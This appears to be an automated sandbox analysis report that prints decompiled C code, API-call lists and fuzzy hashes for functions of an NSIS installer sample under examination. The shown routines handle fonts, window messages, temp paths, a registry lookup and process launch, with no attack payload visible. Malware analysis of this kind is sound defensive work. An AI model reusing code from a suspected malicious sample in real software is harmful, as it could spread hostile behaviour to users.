                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                              • String ID:
                                                              • API String ID: 1849352358-0
                                                              • Opcode ID: 6bf6946672e698bf1bfe4de63576d549b40da2e57045ab1ce7509431734d3278
                                                              • Instruction ID: 488f83a01e3392fad3bf683b4443aaeb9baaf514c425c8ec37ca45fc88de17ea
                                                              • Opcode Fuzzy Hash: 6bf6946672e698bf1bfe4de63576d549b40da2e57045ab1ce7509431734d3278
                                                              • Instruction Fuzzy Hash: E9212A72E00109AFCF15DFA4DD85AAEBBB5EB88300F24417EF911F62A1CB389941DB54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00401E35, Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 73%
                                                              			E00401E35(intOrPtr __edx) {
				void* __esi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				struct HDC__* _t31;
				void* _t33;
				void* _t35;

				_t30 = __edx;
				_t31 = GetDC( *(_t35 - 8));
				_t9 = E00402BAC(2);
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				0x40b820->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t31);
				 *0x40b830 = E00402BAC(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x18));
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				 *0x40b837 = 1;
				 *0x40b834 = _t15 & 0x00000001;
				 *0x40b835 = _t15 & 0x00000002;
				 *0x40b836 = _t15 & 0x00000004;
				E004062BB(_t9, _t31, _t33, 0x40b83c,  *((intOrPtr*)(_t35 - 0x24)));
				_t18 = CreateFontIndirectA(0x40b820);
				_push(_t18);
				_push(_t33);
				E00406186();
				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                                                              0x00401e35
                                                              0x00401e40
                                                              0x00401e42
                                                              0x00401e4f
                                                              0x00401e66
                                                              0x00401e6b
                                                              0x00401e78
                                                              0x00401e7d
                                                              0x00401e81
                                                              0x00401e8c
                                                              0x00401e93
                                                              0x00401ea5
                                                              0x00401eab
                                                              0x00401eb0
                                                              0x00401eba
                                                              0x00402620
                                                              0x00401569
                                                              0x004029a5
                                                              0x00402a5d
                                                              0x00402a69

                                                              APIs
                                                              • GetDC.USER32(?), ref: 00401E38
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                                                              • MulDiv.KERNEL32 ref: 00401E5A
                                                              • ReleaseDC.USER32(?,00000000), ref: 00401E6B
                                                              • CreateFontIndirectA.GDI32(0040B820), ref: 00401EBA
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                              • String ID:
                                                              • API String ID: 3808545654-0
                                                              • Opcode ID: 58c68d17d92a7b2530b6f57be575cc9bfeb44b1e921b0f803df6e483c56fd12b
                                                              • Instruction ID: 5097186ed897f0bb8f2c49de76e9dd96fe00b68d7cb2a8ba7479d5b6a1f75869
                                                              • Opcode Fuzzy Hash: 58c68d17d92a7b2530b6f57be575cc9bfeb44b1e921b0f803df6e483c56fd12b
                                                              • Instruction Fuzzy Hash: 18014072504344AEE7017BA4AE89B9A7FF8E755701F10547AF141B61F2CB790445CB6C
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00401C2E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 59%
                                                              			E00401C2E(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				CHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t61;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402BAC(3);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 - 8) = _t29;
				_t30 = E00402BAC(4);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402BCE(0x33);
				}
				__eflags =  *(_t64 - 0x14) & 0x00000002;
				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402BCE(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t59 = E00402BCE();
					_t32 = E00402BCE();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t59;
					__eflags = _t35;
					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t61 = E00402BAC();
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t41 = E00402BAC(2);
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t56 =  *(_t64 - 0x14) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
						L10:
						 *(_t64 - 0xc) = _t36;
					} else {
						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
					_push( *(_t64 - 0xc));
					E00406186();
				}
				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                                                              0x00401c2e
                                                              0x00401c30
                                                              0x00401c37
                                                              0x00401c3a
                                                              0x00401c3d
                                                              0x00401c47
                                                              0x00401c4b
                                                              0x00401c4e
                                                              0x00401c57
                                                              0x00401c57
                                                              0x00401c5a
                                                              0x00401c5e
                                                              0x00401c67
                                                              0x00401c67
                                                              0x00401c6a
                                                              0x00401c6e
                                                              0x00401c70
                                                              0x00401cc5
                                                              0x00401cc7
                                                              0x00401cd0
                                                              0x00401cd8
                                                              0x00401cdb
                                                              0x00401cdb
                                                              0x00401ce4
                                                              0x00000000
                                                              0x00401c72
                                                              0x00401c79
                                                              0x00401c7b
                                                              0x00401c7e
                                                              0x00401c84
                                                              0x00401c8b
                                                              0x00401c8e
                                                              0x00401cb6
                                                              0x00401cea
                                                              0x00401cea
                                                              0x00401c90
                                                              0x00401c9e
                                                              0x00401ca6
                                                              0x00401ca9
                                                              0x00401ca9
                                                              0x00401c8e
                                                              0x00401ced
                                                              0x00401cf0
                                                              0x00401cf6
                                                              0x004029a5
                                                              0x004029a5
                                                              0x00402a5d
                                                              0x00402a69

                                                              APIs
                                                              • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                                                              • SendMessageA.USER32 ref: 00401CB6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: MessageSend$Timeout
                                                              • String ID: !
                                                              • API String ID: 1777923405-2657877971
                                                              • Opcode ID: fd1638e98ba6d3c211dbcd30864b3267bbc4afbfdbf9ed1ecbf77a0a26ee8f5b
                                                              • Instruction ID: 90c6e89302a946556e44a8134fdeeaca46b2157ebe1368c161caa9607488c25b
                                                              • Opcode Fuzzy Hash: fd1638e98ba6d3c211dbcd30864b3267bbc4afbfdbf9ed1ecbf77a0a26ee8f5b
                                                              • Instruction Fuzzy Hash: 80216071A44208BEEB05DFB5D98AAAD7FB4EF44304F20447FF502B61D1D6B88541DB28
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00405BC0, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00405BC0(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x40a014);
				}
				return _t7;
			}




                                                              0x00405bc1
                                                              0x00405bd8
                                                              0x00405be0
                                                              0x00405be0
                                                              0x00405be8

                                                              APIs
                                                              • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040344E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 00405BC6
                                                              • CharPrevA.USER32(?,00000000), ref: 00405BCF
                                                              • lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405BE0
                                                              Strings
                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BC0
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: CharPrevlstrcatlstrlen
                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                              • API String ID: 2659869361-4017390910
                                                              • Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                              • Instruction ID: d6a8f4146c737b4c1111608fba26ea94f920a63204c4a5504a78fba285be9fad
                                                              • Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                              • Instruction Fuzzy Hash: 2CD0A7721055307BD21237154C09ECF2A488F0230470A006BF541B6191C73C5C1187FE
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00405C59, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00405C59(CHAR* _a4) {
				CHAR* _t5;
				char* _t7;
				CHAR* _t9;
				char _t10;
				CHAR* _t11;
				void* _t13;

				_t11 = _a4;
				_t9 = CharNextA(_t11);
				_t5 = CharNextA(_t9);
				_t10 =  *_t11;
				if(_t10 == 0 ||  *_t9 != 0x3a || _t9[1] != 0x5c) {
					if(_t10 != 0x5c || _t11[1] != _t10) {
						L10:
						return 0;
					} else {
						_t13 = 2;
						while(1) {
							_t13 = _t13 - 1;
							_t7 = E00405BEB(_t5, 0x5c);
							if( *_t7 == 0) {
								goto L10;
							}
							_t5 = _t7 + 1;
							if(_t13 != 0) {
								continue;
							}
							return _t5;
						}
						goto L10;
					}
				} else {
					return CharNextA(_t5);
				}
			}









                                                              0x00405c62
                                                              0x00405c69
                                                              0x00405c6c
                                                              0x00405c6e
                                                              0x00405c72
                                                              0x00405c87
                                                              0x00405ca6
                                                              0x00000000
                                                              0x00405c8e
                                                              0x00405c90
                                                              0x00405c91
                                                              0x00405c94
                                                              0x00405c95
                                                              0x00405c9d
                                                              0x00000000
                                                              0x00000000
                                                              0x00405c9f
                                                              0x00405ca2
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00405ca2
                                                              0x00000000
                                                              0x00405c91
                                                              0x00405c7f
                                                              0x00000000
                                                              0x00405c80

                                                              APIs
                                                              Strings
                                                              • C:\Users\user\AppData\Local\Temp\nsxAB11.tmp, xrefs: 00405C5A
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: CharNext
                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsxAB11.tmp
                                                              • API String ID: 3213498283-1143524229
                                                              • Opcode ID: 822f20ec9a8b35058aaebb4724fdb7f7397eab756ad02150ec19b841d432d8ed
                                                              • Instruction ID: 9a9653d8387983e914f74c1f8e9a863a5ef5a61ad4bce0684ac50a06ae96742d
                                                              • Opcode Fuzzy Hash: 822f20ec9a8b35058aaebb4724fdb7f7397eab756ad02150ec19b841d432d8ed
                                                              • Instruction Fuzzy Hash: 70F06291D0CF612BFB3256684C84B775E88CB55359F18407BDA80EA2C1C27C58808B9A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00403949, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00403949() {
				void* _t1;
				void* _t2;
				signed int _t11;

				_t1 =  *0x40a018; // 0x184
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
				}
				_t2 =  *0x40a01c; // 0x17c
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x40a01c =  *0x40a01c | 0xffffffff;
					_t11 =  *0x40a01c;
				}
				E004039A6();
				return E004059F0(_t11, "C:\\Users\\Albus\\AppData\\Local\\Temp\\nsxAB11.tmp", 7);
			}






                                                              0x00403949
                                                              0x00403958
                                                              0x0040395b
                                                              0x0040395d
                                                              0x0040395d
                                                              0x00403964
                                                              0x0040396c
                                                              0x0040396f
                                                              0x00403971
                                                              0x00403971
                                                              0x00403971
                                                              0x00403978
                                                              0x0040398a

                                                              APIs
                                                              • CloseHandle.KERNEL32(00000184), ref: 0040395B
                                                              • CloseHandle.KERNEL32(0000017C), ref: 0040396F
                                                              Strings
                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 0040394E
                                                              • C:\Users\user\AppData\Local\Temp\nsxAB11.tmp, xrefs: 0040397F
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsxAB11.tmp
                                                              • API String ID: 2962429428-462514260
                                                              • Opcode ID: 462e3e9a24158b25b8329b1cd15e1f965bb5a7db837425cedf417ff9a75e81db
                                                              • Instruction ID: e7b4e10e42ecc32fc510515b664fd575b34ef2c347d966a0cc54db6954a3096e
                                                              • Opcode Fuzzy Hash: 462e3e9a24158b25b8329b1cd15e1f965bb5a7db837425cedf417ff9a75e81db
                                                              • Instruction Fuzzy Hash: 6AE08C71944B1896C130AF7CAD4E9953B1C9B413367244726F078F20F0C7789AA75AEE
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004052C3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 89%
                                                              			E004052C3(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x420d3c != _t16) {
							_push(_t16);
							_push(6);
							 *0x420d3c = _t16;
							E00404C7F();
						}
						L11:
						return CallWindowProcA( *0x420d44, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404BFF(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E004042F8(0x413);
				return 0;
			}





                                                              0x004052c7
                                                              0x004052d1
                                                              0x004052ed
                                                              0x0040530f
                                                              0x00405312
                                                              0x00405318
                                                              0x00405322
                                                              0x00405323
                                                              0x00405325
                                                              0x0040532b
                                                              0x0040532b
                                                              0x00405335
                                                              0x00000000
                                                              0x00405343
                                                              0x004052fa
                                                              0x00405332
                                                              0x00405332
                                                              0x00000000
                                                              0x00405332
                                                              0x00405306
                                                              0x00405308
                                                              0x00000000
                                                              0x00405308
                                                              0x004052d7
                                                              0x00000000
                                                              0x00000000
                                                              0x004052de
                                                              0x00000000

                                                              APIs
                                                              • IsWindowVisible.USER32(?), ref: 004052F2
                                                              • CallWindowProcA.USER32(?,?,?,?), ref: 00405343
                                                                • Part of subcall function 004042F8: SendMessageA.USER32 ref: 0040430A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: Window$CallMessageProcSendVisible
                                                              • String ID:
                                                              • API String ID: 3748168415-3916222277
                                                              • Opcode ID: 267171b98df2b592aa392984fc350499d3aadededac15f67a9f8d07fb1712162
                                                              • Instruction ID: 59df81840e01a834e8184741018ea8653580e9c1f0e113f815542439c818a584
                                                              • Opcode Fuzzy Hash: 267171b98df2b592aa392984fc350499d3aadededac15f67a9f8d07fb1712162
                                                              • Instruction Fuzzy Hash: 61017C71200608AFDF209F51DD81AAB3B66EB94394F50453BFA04761D1C7BA9C929F2D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00405CAE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 53%
                                                              			E00405CAE(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				void* _t22;

				E00406228(0x422158, _a4);
				_t21 = E00405C59(0x422158);
				if(_t21 != 0) {
					E00406503(_t21);
					if(( *0x42475c & 0x00000080) == 0) {
						L5:
						_t22 = _t21 - 0x422158;
						while(1) {
							_t11 = lstrlenA(0x422158);
							_push(0x422158);
							if(_t11 <= _t22) {
								break;
							}
							_t12 = E0040659C();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405C07(0x422158);
								continue;
							} else {
								goto L1;
							}
						}
						E00405BC0();
						return 0 | GetFileAttributesA(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}








                                                              0x00405cba
                                                              0x00405cc5
                                                              0x00405cc9
                                                              0x00405cd0
                                                              0x00405cdc
                                                              0x00405ce8
                                                              0x00405ce8
                                                              0x00405d00
                                                              0x00405d01
                                                              0x00405d08
                                                              0x00405d09
                                                              0x00000000
                                                              0x00000000
                                                              0x00405cec
                                                              0x00405cf3
                                                              0x00405cfb
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00405cf3
                                                              0x00405d0b
                                                              0x00000000
                                                              0x00405d1f
                                                              0x00405cde
                                                              0x00405ce2
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00405ce2
                                                              0x00405ccb
                                                              0x00000000

                                                              APIs
                                                                • Part of subcall function 00406228: lstrcpynA.KERNEL32(?,?,00000400,00403533,00423F40,NSIS Error,?,00000007,00000009,0000000B), ref: 00406235
                                                                • Part of subcall function 00405C59: CharNextA.USER32(?), ref: 00405C67
                                                                • Part of subcall function 00405C59: CharNextA.USER32(00000000), ref: 00405C6C
                                                                • Part of subcall function 00405C59: CharNextA.USER32(00000000), ref: 00405C80
                                                              • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsxAB11.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsxAB11.tmp,C:\Users\user\AppData\Local\Temp\nsxAB11.tmp,76712754,?,766F13E0,00405A10,?,76712754,766F13E0,00000000), ref: 00405D01
                                                              • GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsxAB11.tmp,C:\Users\user\AppData\Local\Temp\nsxAB11.tmp,C:\Users\user\AppData\Local\Temp\nsxAB11.tmp,C:\Users\user\AppData\Local\Temp\nsxAB11.tmp,C:\Users\user\AppData\Local\Temp\nsxAB11.tmp,C:\Users\user\AppData\Local\Temp\nsxAB11.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsxAB11.tmp,C:\Users\user\AppData\Local\Temp\nsxAB11.tmp,76712754,?,766F13E0,00405A10,?,76712754,766F13E0), ref: 00405D11
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsxAB11.tmp
                                                              • API String ID: 3248276644-1143524229
                                                              • Opcode ID: 8df147695d567d3479fd9fb611e01f2e4261d231372b324086cf0464a71b3f28
                                                              • Instruction ID: 810c58eff44cea92ea74d6fc536401bd0fed09a955b2fb282e84a1b8880da462
                                                              • Opcode Fuzzy Hash: 8df147695d567d3479fd9fb611e01f2e4261d231372b324086cf0464a71b3f28
                                                              • Instruction Fuzzy Hash: 31F0F921109F5125E62232761D09B9F1E54CD97324745457FF8A1B23D2CB3C8853DD6D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040610F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 90%
                                                              			E0040610F(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x400;
				_t21 = E004060AE(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x3ff] = _t30[0x3ff] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                                                              0x0040611d
                                                              0x0040611f
                                                              0x00406137
                                                              0x0040613c
                                                              0x00406141
                                                              0x0040617e
                                                              0x0040617e
                                                              0x00406143
                                                              0x00406155
                                                              0x00406160
                                                              0x00406166
                                                              0x00406170
                                                              0x00000000
                                                              0x00000000
                                                              0x00406170
                                                              0x00406183

                                                              APIs
                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,uvlcopdlxoed,00420530,?,?,?,00000002,uvlcopdlxoed,?,004063C4,80000002), ref: 00406155
                                                              • RegCloseKey.ADVAPI32(?,?,004063C4,80000002,Software\Microsoft\Windows\CurrentVersion,uvlcopdlxoed,uvlcopdlxoed,uvlcopdlxoed,?,00420530), ref: 00406160
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: CloseQueryValue
                                                              • String ID: uvlcopdlxoed
                                                              • API String ID: 3356406503-3939465813
                                                              • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                              • Instruction ID: a564c047acf5d73f9aa125f5b2549426a44a408a2c37113ac8a3848fd8f43ee5
                                                              • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                              • Instruction Fuzzy Hash: 8B015A72500209BBDF228F61CC0AFDB3BA8EF55364F01403AF95AA6191D678D964DBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004058C7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E004058C7(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x422558->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x422558,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                              0x004058d0
                                                              0x004058f0
                                                              0x004058f8
                                                              0x004058fd
                                                              0x00000000
                                                              0x00405903
                                                              0x00405907

                                                              APIs
                                                              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00422558,Error launching installer), ref: 004058F0
                                                              • CloseHandle.KERNEL32(?), ref: 004058FD
                                                              Strings
                                                              • Error launching installer, xrefs: 004058DA
                                                              Memory Dump Source
